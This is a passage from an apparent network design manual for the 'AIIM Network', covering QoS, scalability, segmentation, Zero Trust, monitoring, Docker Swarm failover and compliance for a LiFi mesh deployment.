Modularity involves organizing the network into discrete functional blocks, such as security, data, and AI modules. This approach isolates different services, making it easier to manage and upgrade parts of the network without affecting the whole system. For example, grouping all security-related functions (firewall, IDS, honeypot) into one module allows for centralized updates and streamlined monitoring.
9.3 Quality of Service (QoS)
QoS lets critical traffic, such as AI inference results and monitoring, take precedence over bulk traffic. Mark packets with DSCP values and configure bandwidth limits on pfSense, bearing in mind that pfSense shaping only affects traffic that crosses pfSense (WAN and tunnel traffic), and that DSCP marks on the LiFi LAN are honored only if the transceiver driver implements priority queues. In the AIIM Network:
- AI-module and monitoring traffic should take precedence over BorgBackup and log-shipping traffic.
- On LiFi links, verify with iperf3 under load that prioritized flows actually keep their latency; if they do not, treat the DSCP marks as documentation rather than enforcement.
9.4 Scalability and Load Balancing
The AIIM Network's fully connected K₁₃ topology is ideal for a small-scale deployment; however, future expansion requires a well-defined scalability plan. This plan should include:
- Expanding Core and Distribution Layers: Adding nodes to handle additional workloads without disrupting existing traffic flows.
- Implementing Load Balancers: Using HAProxy or similar tools to distribute traffic evenly across service nodes, thus preventing any single node from becoming a bottleneck.
- Modular Expansion: Creating additional network modules for security, data, or AI processing, connected through high-speed backbone links.
9.5 Network Segmentation and Enhanced Security
Segmentation divides the network into isolated zones, limiting the spread of potential breaches. In the AIIM Network:
- Security zones should isolate critical services such as intrusion detection, AI inference, and data processing.
- VLANs and ACLs ensure that only authorized traffic passes between segments, limiting lateral movement. In the full mesh, nodes reach each other directly over LiFi without passing through pfSense, so per-node host firewalls (nftables or ufw) are the enforcement point for intra-LAN ACLs; pfSense enforces only at the WAN and tunnel boundaries.
A Zero Trust approach adds to this by authenticating every access (SSH keys, mutual TLS between services) and logging every connection, rather than trusting a node because it is on the LAN.
9.6 Performance Monitoring and Optimization
Continuous performance monitoring is critical for maintaining an efficient network. Beyond using Prometheus for basic metrics, administrators should track:
- Bandwidth utilization across LiFi and VPN links.
- Latency and jitter between critical nodes.
- Packet loss and error rates during peak loads.
Optimization strategies include fine-tuning kernel parameters via sysctl, optimizing disk I/O with SSDs and RAID configurations, and adjusting network buffers. Regular performance benchmarks using tools such as Phoronix Test Suite provide insights into the impact of configuration changes.
9.7 Redundancy and Failover Mechanisms
Despite the high connectivity of the K₁₃ topology, physical redundancy is paramount. This involves:
- Deploying dual power supplies and backup LiFi transceivers for critical nodes.
- Configuring pfSense for WAN failover with multiple ISPs.
- Using Docker Swarm to restart replicated service tasks on surviving nodes when a host fails. This works only while a manager quorum exists: with a single manager on Node 5, losing Node 5 takes down both the VMs (Nodes 7-12) and swarm scheduling, so run three managers on separate physical hosts (for example Nodes 3, 4 and 5) and set `--replicas` greater than one for critical services.
9.8 Compliance with Industry Standards
Ensuring compliance with regulations such as GDPR and ISO 27001 is critical. The AIIM Network should incorporate:
- Strict data handling policies, especially for logs and monitoring data stored in Elasticsearch.
- Comprehensive audit trails and regular security assessments using tools like Nessus.
- Documented change management processes to support regulatory compliance and operational transparency.
9.9 Future Directions and Emerging Trends
The field of network design is rapidly evolving with the integration of AI, edge computing, and intent-based networking. Future enhancements to the AIIM Network may include:
- Intent-Based Networking (IBN): Automating network configuration based on high-level business policies.
- Edge Computing: Distributing processing closer to the data source for improved latency and efficiency.
- Serverless Architectures: Leveraging cloud functions to handle transient workloads without dedicated infrastructure.
- Enhanced AI Integration: Using advanced machine learning algorithms for predictive maintenance and automated threat remediation.
Staying ahead of these trends will require ongoing research, training, and adaptation. The AIIM Network manual should be viewed as a living document—continuously updated to reflect the latest technological advancements and best practices.
9.10 Conclusion
By integrating hierarchical design, modularity, Quality of Service, scalability planning, network segmentation, comprehensive performance monitoring, redundancy, and compliance measures, the AIIM Network is poised to become a benchmark in secure, high-performance distributed systems. This extended documentation not only fills in the gaps of the initial manual but also provides a forward-looking perspective essential for operating in an ever-changing technological landscape.
With these enhancements, network administrators and IT professionals are equipped with an exhaustive guide that empowers them to deploy, manage, and continuously improve the AIIM Network. As new challenges and opportunities arise, the principles and strategies outlined herein will serve as a robust foundation for future innovation and operational excellence.